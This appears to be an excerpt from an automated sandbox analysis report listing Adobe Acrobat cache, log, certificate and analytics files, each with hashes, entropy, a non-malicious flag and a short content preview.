                                                                          SSDEEP:12:YH/um3RA8sq69ZsBdOg2HWmcaq3QYiubcP7E4T3y:Y2sRdsv9KdMHi3QYhbA7nby
                                                                          MD5:1771E679EAFB10D1A1CA3A3FE32D3BE0
                                                                          SHA1:6B5A5FA429A19A3170507CD6DF2A261D9BECF4D4
                                                                          SHA-256:C7F18036F5769EFAE14F7EFE0E8302A193109BEC1BAF65BC8FDB7F5AF04E70EB
                                                                          SHA-512:4C3A59FDB204BA5F8269ADA6759B338A5CB4B6089533A86935A9ADDD7FEE5360E8216CD757303569D4D7701684BB12C40A8545DB4368BD84C63BB98D79A75D94
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13385669108883883","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":213012},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:modified
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.956830607420186
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sq69ZsBdOg2HWmcaq3QYiubcP7E4T3y:Y2sRdsv9KdMHi3QYhbA7nby
                                                                          MD5:1771E679EAFB10D1A1CA3A3FE32D3BE0
                                                                          SHA1:6B5A5FA429A19A3170507CD6DF2A261D9BECF4D4
                                                                          SHA-256:C7F18036F5769EFAE14F7EFE0E8302A193109BEC1BAF65BC8FDB7F5AF04E70EB
                                                                          SHA-512:4C3A59FDB204BA5F8269ADA6759B338A5CB4B6089533A86935A9ADDD7FEE5360E8216CD757303569D4D7701684BB12C40A8545DB4368BD84C63BB98D79A75D94
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13385669108883883","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":213012},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):5859
                                                                          Entropy (8bit):5.241210659280982
                                                                          Encrypted:false
                                                                          SSDEEP:96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7zNrDC:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhg
                                                                          MD5:2CC96748CDB9CFE4356C1FA92D1E9359
                                                                          SHA1:C818742C5E6CC882E88B7831DB1AD2BF9205D70B
                                                                          SHA-256:DB71CAAB5772960C25A1CA2E5BE2854FD84BD301225A3BEE03E01E64A70F12DD
                                                                          SHA-512:A6F2272084788F90940DDCC5E83933E628CF0A0414F108FF75D164C9878DC91AB104415572DABB8311CD9FCE6DB9768E4F9F690F6DF5F25012C04427FE7BF788
                                                                          Malicious:false
                                                                          Preview:*...#................version.1..namespace-.X.Bo................next-map-id.1.Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/.0.>j.r................next-map-id.2.Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/.1.J.4r................next-map-id.3.Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/.2..J.o................next-map-id.4.Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.3..M.^...............Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/..d.^...............Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.u..a...............Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/..`aa...............Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/`v.Yo................next-map-id.5.Pnamespace-30587558_ed88_4bd8_adc0_
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):327
                                                                          Entropy (8bit):5.146135142410795
                                                                          Encrypted:false
                                                                          SSDEEP:6:iOTXfVq2PN72nKuAl9OmbzNMxIFUt5XpgZmwXXKIkwON72nKuAl9OmbzNMFLJ:7DVvVaHAa8jFUtPg/qI5OaHAa84J
                                                                          MD5:51897379B5C55DA76ECEB4554CB226FC
                                                                          SHA1:F452C19A283728363F6280C378067BE36F23CE3F
                                                                          SHA-256:BCF474335FF6997F9DADE5B8ACF6199DAB6F5A5E2CE3D3D763458FF1B5F39514
                                                                          SHA-512:D537E595795041A44C44213B0B58594780C7C04644DD4BEA79583D2CF6A7245D06A4B683BA63E750E9CA3C384C834BFE16AFCEA2B2A068D742FB01F1F80CB0C3
                                                                          Malicious:false
                                                                          Preview:2025/03/04-12:25:03.368 860 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/03/04-12:25:03.380 860 Recovering log #3.2025/03/04-12:25:03.385 860 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):327
                                                                          Entropy (8bit):5.146135142410795
                                                                          Encrypted:false
                                                                          SSDEEP:6:iOTXfVq2PN72nKuAl9OmbzNMxIFUt5XpgZmwXXKIkwON72nKuAl9OmbzNMFLJ:7DVvVaHAa8jFUtPg/qI5OaHAa84J
                                                                          MD5:51897379B5C55DA76ECEB4554CB226FC
                                                                          SHA1:F452C19A283728363F6280C378067BE36F23CE3F
                                                                          SHA-256:BCF474335FF6997F9DADE5B8ACF6199DAB6F5A5E2CE3D3D763458FF1B5F39514
                                                                          SHA-512:D537E595795041A44C44213B0B58594780C7C04644DD4BEA79583D2CF6A7245D06A4B683BA63E750E9CA3C384C834BFE16AFCEA2B2A068D742FB01F1F80CB0C3
                                                                          Malicious:false
                                                                          Preview:2025/03/04-12:25:03.368 860 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/03/04-12:25:03.380 860 Recovering log #3.2025/03/04-12:25:03.385 860 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                          Category:dropped
                                                                          Size (bytes):65110
                                                                          Entropy (8bit):2.4345566993572247
                                                                          Encrypted:false
                                                                          SSDEEP:192:QPqF+ZwLHksUB0LYEEfod1u6OxUf51Kg/Vs6I:4Z0YwFOxUx1He6I
                                                                          MD5:AED93E9523E128E9B860DF77D61E9982
                                                                          SHA1:4485EC483A2AFA8969D5954A6E3E9A5F51B2B855
                                                                          SHA-256:98E6B0618EAF7520F6966CD986F4641B1641F9E47DE2DAC0AD6423CA5C971BFC
                                                                          SHA-512:2549D208D74A659DDE20B9C76641DA3BB0E1E4ACDB10B077ABCBEE831EDCBF9E777D135F949D8203CD0E83280977984BF0AC81AA3A277DA64390EAD3E03B4D19
                                                                          Malicious:false
                                                                          Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                                          Category:dropped
                                                                          Size (bytes):86016
                                                                          Entropy (8bit):4.4448532947230905
                                                                          Encrypted:false
                                                                          SSDEEP:384:ye6ci5ttiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:mGs3OazzU89UTTgUL
                                                                          MD5:9D1F3C01A401AE1511D465DED1B91AD2
                                                                          SHA1:4CBD45BE38C91EDA46B7BEDDC4A52812A96BCA20
                                                                          SHA-256:F1CC5CACB7ADF30682D79ED363FBF8D09B140BF2BF0574526C95FE6BA9323ED9
                                                                          SHA-512:818FBF24528EAF93A1BE297962CC7BBA58D75DAA4BE8D137FA9A81F8CA1A7C1393785BB24F4268055A92B004CFFD86DF7124B6C8A65AD9CDE59C7A952580B35C
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite Rollback Journal
                                                                          Category:dropped
                                                                          Size (bytes):8720
                                                                          Entropy (8bit):3.768042942694877
                                                                          Encrypted:false
                                                                          SSDEEP:48:7MJgJioyVQioyeoy1C7oy16oy1OKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1Y:7NJuQmNXjBixb9IVXEBodRBkm
                                                                          MD5:2ABBD2B2A3551507551C935259256814
                                                                          SHA1:5C0A2062083ECEAE2DF3523E1ABB6E6525D56C73
                                                                          SHA-256:718DEE86CC624A0068A2140D9FEB70361A3CAB473A8D4B9D13AF6E31A6B4F88B
                                                                          SHA-512:1303381DC8B545F925F5EF694AFA27758E343A36A2109BB2211D4BE5207E74EDA1E507A1EC8907DD3080D6723B7A1488818A6C4378FB3688BA0CFFDFE4CD6DD5
                                                                          Malicious:false
                                                                          Preview:.... .c........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:Certificate, Version=3
                                                                          Category:dropped
                                                                          Size (bytes):1391
                                                                          Entropy (8bit):7.705940075877404
                                                                          Encrypted:false
                                                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                          Malicious:false
                                                                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                          Category:dropped
                                                                          Size (bytes):73305
                                                                          Entropy (8bit):7.996028107841645
                                                                          Encrypted:true
                                                                          SSDEEP:1536:krha8mqJ7v3CeFMz/akys7nSTK7QMuK+C/Oh5:kAOFq+Mba9Ok7C/O/
                                                                          MD5:83142242E97B8953C386F988AA694E4A
                                                                          SHA1:833ED12FC15B356136DCDD27C61A50F59C5C7D50
                                                                          SHA-256:D72761E1A334A754CE8250E3AF7EA4BF25301040929FD88CF9E50B4A9197D755
                                                                          SHA-512:BB6DA177BD16D163F377D9B4C63F6D535804137887684C113CC2F643CEAB4F34338C06B5A29213C23D375E95D22EF417EAC928822DFB3688CE9E2DE9D5242D10
                                                                          Malicious:false
                                                                          Preview:MSCF....Y.......,...................I.................;Za. .authroot.stl.98.?.6..CK..<Tk......4..c... .Ec...U.d.d.E&I.DH*..M.KB."..rK.RQ*..}f..f...}..1....9...........$.8q..fa...7.o.1.0...bfsM4.........u..l..0..4.a.t....0.....6#....n. :... ....%.,CQ5uU..(.3.<7#.0..JN.$...=j|w..*.#.oU..Eq[..P..^..~.V...;..m...I|...l..@-W..=.QQ.._./.M.nZ..(.........`.$Z.9wW:W.]..8*E.......I.D{..n...K:.m..^.(.S.......c..s.y..<...2.%o.o.....H.B.R.....11.|!.(...........h.SZ........<...^....Z>.Pp?... .pT@p.#.&..........#VEV=.....p........y..."T=l.n..egf.w..X.Y..-G...........KQ.]...pM..[m..-6.wd:........T...:.P5Zs....c.oT`..F1#......EuD.......7....V ..-....!.N..%S...k...S. ...@.J..../..b!B.(=\../.l......`.\...q9..>4!b..8EH.....zdy.....#...X>%0w...i.,>c.z.g"p.S..2W.+mMs.....5Def.....#._D.4....>}...i...\.&`D.......z;..ZY.3.+t.`....z_.q'w.z.)..j3.+.co.s..:.........qK...{...E....uPO...#vs.XxH.B!..(t. 8k+.....G\..?..GF8....'..w.>.ms..\ve.nFN..W)....xi..u..5.f.l....
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):192
                                                                          Entropy (8bit):2.779094196322516
                                                                          Encrypted:false
                                                                          SSDEEP:3:kkFklUmHPopl1fllXlE/HT8ko8ZNNX8RolJuRdxLlGB9lQRYwpDdt:kKNWPg2T863NMa8RdWBwRd
                                                                          MD5:5AB44437C7466EFD70194C6E15008453
                                                                          SHA1:F3EDF590357EDC2BD106F88C034C7D5B23DB01D1
                                                                          SHA-256:4B14AC03FB2FEC80DAB4148188600565227DAFF9D419FA69B728334ACDB16B8E
                                                                          SHA-512:B68860FD1850124345C2E70B6549285AA2447B3B9A2AD6BEBDF9F49A7243F09B1A48AEABDBA8D10B4B42319D4355FC235852B3941039E034C2E223EF24538BF8
                                                                          Malicious:false
                                                                          Preview:p...... ..........d*...(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):330
                                                                          Entropy (8bit):3.275015080634202
                                                                          Encrypted:false
                                                                          SSDEEP:6:kKbqHmcQRnSN+SkQlPlEGYRMY9z+4KlDA3RUeqpGVuys1:TqHmfZkPlE99SNxAhUeq8S
                                                                          MD5:B3276A911CE80796D9A525C59CFAC16A
                                                                          SHA1:59085286C3DE3A9AA48B2030408E842C24585B9B
                                                                          SHA-256:AC898779A3BF990E957F614DCBA8F084D67EB476B060A1BFAC60030AD400E1E9
                                                                          SHA-512:C5631D1CA78A0889CD1BE4B442E738575116F7F3B2012FDC238B77F3690880381630AD08AF20C504BE46B727DA8FF3756D2F0E601E56C539B03B13887E763553
                                                                          Malicious:false
                                                                          Preview:p...... ...........v*...(....................................................... ..................(....c*.....Y...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.4.2.7.f.6.c.2.b.7.8.7.d.b.1.:.0."...
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):231040
                                                                          Entropy (8bit):3.370631145103289
                                                                          Encrypted:false
                                                                          SSDEEP:1536:JKPC4iyzDtrh1cK3XEivK7VK/3AYvYwgFjrRoL+sn:IPCaJ/3AYvYwgZFoL+sn
                                                                          MD5:D05DBDB1C060D4A8A3821FF2B1F348D1
                                                                          SHA1:14150B42AFA600CF62A7816FA6BBA51FD50637A2
                                                                          SHA-256:DB9EAD3DA3BF9F21E75D642C2ACF290ED3CC3B6867DB3D3D86290794FF4C069B
                                                                          SHA-512:ED084FD0F4B4472FA757B483A95802A35220235B8F79F2EBB8EAE6013D296C31C8E71777719E8E8AF61CCE66F29C3911E24468F692E41FE69028946584C24B8D
                                                                          Malicious:false
                                                                          Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):295
                                                                          Entropy (8bit):5.3748340560697
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXasxwnYvnZiQ0Y/kcN2xoAvJM3g98kUwPeUkwRe9:YvXKXaOUGcmkuGMbLUkee9
                                                                          MD5:EE1C71FED663EA654C22FB766445C501
                                                                          SHA1:410316A75EE9184503C80E419ACD13C027AC23DA
                                                                          SHA-256:69B9957374B42B16864F154C91C32B9A111F4B00487E57092EEEB9905BCB82A2
                                                                          SHA-512:628AE42FBB378A6223A6AD3AC44272A17F288385FB0690AF362A64B61FAC2A1569CE189F08C0707E91B179AF85F32E952B5FD2ACD5A1C093960B4F40B9A82AEE
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"19b63109-749f-4ae1-844b-6e1d22b3bfbb","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1741285179688,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.327968061555397
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXasxwnYvnZiQ0Y/kcN2xoAvJfBoTfXpnrPeUkwRe9:YvXKXaOUGcmkuGWTfXcUkee9
                                                                          MD5:AFEE3F2CE1F836117D6644F3C2E173B1
                                                                          SHA1:2D6DD01041E4E9E62FA79A198D2E2BF88ABFF2DD
                                                                          SHA-256:CBFA0A408A7DE854FF50F0ADD12D6A064D7630DE749DCED72A3482D7C86D4DE4
                                                                          SHA-512:2ADE8DF40FCCA5458CC522830957120580825D83D59BD61B6E13DE430ECD8FF93405978C54B403389C971978EE3BE893EE0146DC838661F042C297037135BF03
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"19b63109-749f-4ae1-844b-6e1d22b3bfbb","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1741285179688,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.307454630692799
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXasxwnYvnZiQ0Y/kcN2xoAvJfBD2G6UpnrPeUkwRe9:YvXKXaOUGcmkuGR22cUkee9
                                                                          MD5:73F5C43F2FCEEC3005FA383AF43EA237
                                                                          SHA1:7EC80AA785C0EAFC968C352F0B67BEE6D4BCBF15
                                                                          SHA-256:7D0EE07D271B7A00B526BB27041BC832E1DED2D9CC15AEC76099F1A60ECCFB57
                                                                          SHA-512:84F9F70A956CB7992882B8314C80EA56737F642F9726A84E0D0E50A2BD35A5E5E5A7F92F10774F53AFF80BF0D5794E510607185FF49BABC3FE1458198F7E6275
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"19b63109-749f-4ae1-844b-6e1d22b3bfbb","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1741285179688,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):285
                                                                          Entropy (8bit):5.3552591113740755
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXasxwnYvnZiQ0Y/kcN2xoAvJfPmwrPeUkwRe9:YvXKXaOUGcmkuGH56Ukee9
                                                                          MD5:BA47510DDD1244CAE01BEFA44A27EBB5
                                                                          SHA1:8B97CED58C24052106ACAC999328D850AE8B8CA8
                                                                          SHA-256:27BF52F257BD5BCA6AD112E31A24BB09D33EF2EB787318D8FAA94BA077490C89
                                                                          SHA-512:50637BB81E9AB35B16FCB58F2C135ED49490366C231782DB5734E719D1D3C452C0192314F11338A5837B73251B13242DFC37CFD704837A7DEC5FA2B907F40C30
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"19b63109-749f-4ae1-844b-6e1d22b3bfbb","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1741285179688,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):2159
                                                                          Entropy (8bit):5.841305670061606
                                                                          Encrypted:false
                                                                          SSDEEP:48:YvvOUfbhgx7hy48Yk68OiOumNcCKOrkUVX:GvNdgBM45kuZumeOH
                                                                          MD5:574BC71B2C77BF97BCD4AF5862423744
                                                                          SHA1:07E9D37DD95BC009EC99E032D84D5CC99B501409
                                                                          SHA-256:A1EAF09E12C984D00CD1E9D37AD5EE5F6D8110835A613C1A1F2B79165D2E76A6
                                                                          SHA-512:90E476FFA16A78932555F55E9BA5CF34CCB184724DAD3B3D169807A3A472F65CF47F42AE1B635F8DC8F68EB3120AA33F6F58929CB7C50F8F2847B2F8BF2B711E
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"19b63109-749f-4ae1-844b-6e1d22b3bfbb","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1741285179688,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"98856_305509ActionBlock_1","campaignId":98856,"containerId":"1","controlGroupId":"","treatmentId":"af52e1bf-3783-40fd-b92d-17e341cad09e","variationId":"305509"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2NvbnZlcnQiLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0xIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRXhwb3J0IFBERnMgdG8gTWljcm9zb2Z0XFxuV29yZCwgRXhjZWwsIGFuZCBQb3dlclBvaW50LiIsImN0YUxhYmVsIjpudWxsLCJjdGFCZWhhdmlvciI6bnVsbCwiY3RhVXJsIjpudWxsLCJjdGFV
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.307054415945316
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXasxwnYvnZiQ0Y/kcN2xoAvJf8dPeUkwRe9:YvXKXaOUGcmkuGU8Ukee9
                                                                          MD5:8B079039282E2D9267302AAF4BD81D51
                                                                          SHA1:1578A5967E2F6093FD078A4E529ACFF4B9C28ED3
                                                                          SHA-256:2807A45C3781F4960722C436E80FC0522A9199D1733F61E1732135E57BAC36C0
                                                                          SHA-512:BB3B6AE7C0C33A1AAC8012C4E72D3E328146544DEC5C0093D3D49FD42C41199B064CC09E81283CD024C65248438D08C3597ADFB715A513A3A36D08BC850E4096
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"19b63109-749f-4ae1-844b-6e1d22b3bfbb","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1741285179688,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):292
                                                                          Entropy (8bit):5.309325193830542
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXasxwnYvnZiQ0Y/kcN2xoAvJfQ1rPeUkwRe9:YvXKXaOUGcmkuGY16Ukee9
                                                                          MD5:DA9C43BEC14D1C29BAC4C3FA29C490D4
                                                                          SHA1:01C4355CD1AD187C72653B809BC9008E178261EA
                                                                          SHA-256:5B84DD3ACEC94B52715DB0E414EBAA1D07214296319940D5EC93E8E58075604C
                                                                          SHA-512:04F7948445E8DB2495B657D30BE18177EAECD9533E3A6223BA387BD51B49A5F6AF60AC4E102B33640C885250DA8BC9FC42891509637B43512338B8C925ACF6F7
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"19b63109-749f-4ae1-844b-6e1d22b3bfbb","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1741285179688,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):2154
                                                                          Entropy (8bit):5.836730940437307
                                                                          Encrypted:false
                                                                          SSDEEP:48:YvvOUfGogxWhN48lkuCiyAQzyODyHKOkQDcSmjWAVX:GvN1gEH4YkuJQO4JOkQoSm1
                                                                          MD5:6685A6D1858B1D00C7B45BD9150568A3
                                                                          SHA1:CC31FB9DD4A98B2538894B21BBBDF1F24BC30528
                                                                          SHA-256:2212656BE07061294D04FA8190D0D29ED0E457B1CC10641017D7DFDD3AF36292
                                                                          SHA-512:A51F428ADB538C7124D1A17828FA20724EDC2202A2AFF1801B260BE7F7E74E25C4D37D746CC9DF162A83562CB38A966574FF443FE7CD51C087F68F3D4408B010
                                                                          Malicious:false
